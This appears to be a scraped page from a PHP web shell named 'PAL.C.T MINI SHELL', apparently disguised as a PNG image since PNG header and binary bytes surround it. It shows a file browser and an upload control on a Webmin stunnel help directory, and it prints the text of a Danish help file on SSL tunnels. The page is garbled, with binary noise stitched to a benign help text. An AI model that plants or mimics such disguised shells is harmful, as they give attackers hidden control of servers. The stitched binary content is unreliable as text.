php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.da.auto.html

<header> Introduktion til SSL-tunneler </header> SSL er en protokol til kryptering af data i en TCP-forbindelse, når den bevæger sig over netværket. Det blev oprindeligt udviklet til at beskytte trafikken mellem webbrowsere og servere, men kan bruges til at kryptere enhver form for datastrøm, der normalt ville blive sendt via TCP-protokollen. <p> SSL-protokollen tillader klienter og servere at autentificere sig selv til hinanden, så en klient kan være sikker på, at den virkelig opretter forbindelse til den vært, den tror, den er. Dette gøres ved hjælp af certifikater, der er udstedt af en certifikatmyndighed, der er anerkendt af klienten (så de kan verificeres) og tilknyttet et bestemt værtsnavn. Uden certifikater kunne en angriber omdirigere en SSL-forbindelse til sin egen server og fange følsomme oplysninger fra en klient, der mener, at den taler til den rigtige server. <p> Alle data, der rejser over internettet, ikke-krypteret, kan indfanges og læses af en angriber med adgang til et af de netværk, den passerer gennem. Selv data, der rejser mellem en klient og et serversystem på et LAN, kan let lytte til. Når du opretter forbindelse til et telnet-, FTP- eller POP3-server, sendes din adgangskode over netværket og kan derfor fanges af en angriber. <p> SSL kan bruges til at beskytte data i denne slags situationer, men kun hvis både klienten og serveren understøtter dem. De fleste webbrowsere og mail-klienter kan oprette SSL-krypterede HTTP-, POP3- og IMAP-forbindelser, men ikke alle web- og POP3-servere kan acceptere dem. Især POP3 er svært at beskytte, fordi den standardserver, der leveres med de fleste Unix-systemer, overhovedet ikke understøtter SSL. Heldigvis er der dog en løsning - stunnel. <p> STunnel er et simpelt program, der konverterer en ikke-krypteret forbindelse til en SSL-krypteret. Det er typisk indstillet til at blive kørt fra en superserver som inetd eller xinetd, og kør derefter et andet program som POP3-serveren, der ikke understøtter SSL. Dette design giver det mulighed for at beskytte enhver server, der normalt køres fra inetd, såsom telnet, NNTP og IMAP-servere. <p> Ikke alle servere kan dog beskyttes med kryptering, fordi der ikke findes nogen klient til at bruge dem i SSL-tilstand. For eksempel har jeg aldrig hørt om en telnet- eller FTP-klient, der kan bruge SSL, fordi den fælles SSH-pakke allerede tillader krypteret fjernindlogning og filoverførsel. <p> Dette Webmin-modul gør det nemt at konfigurere superserver-tjenester, der kører STunnel for at starte et serverprogram. Selvom dette kan gøres manuelt ved hjælp af modulet Internet Services, er denne specielt designet til opsætning og konfiguration af STunnel. Det registrerer automatisk, om du har inetd og / eller xinetd installeret, læser deres konfigurationer for at tjekke for eksisterende SSL-tunneler og tilføjer dem, når du opretter en ny tunnel. Hvis begge er installeret, tilføjes nye SSL-tunneler til xinetd-konfigurationen, da det er den overlegne af de to efter min mening. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`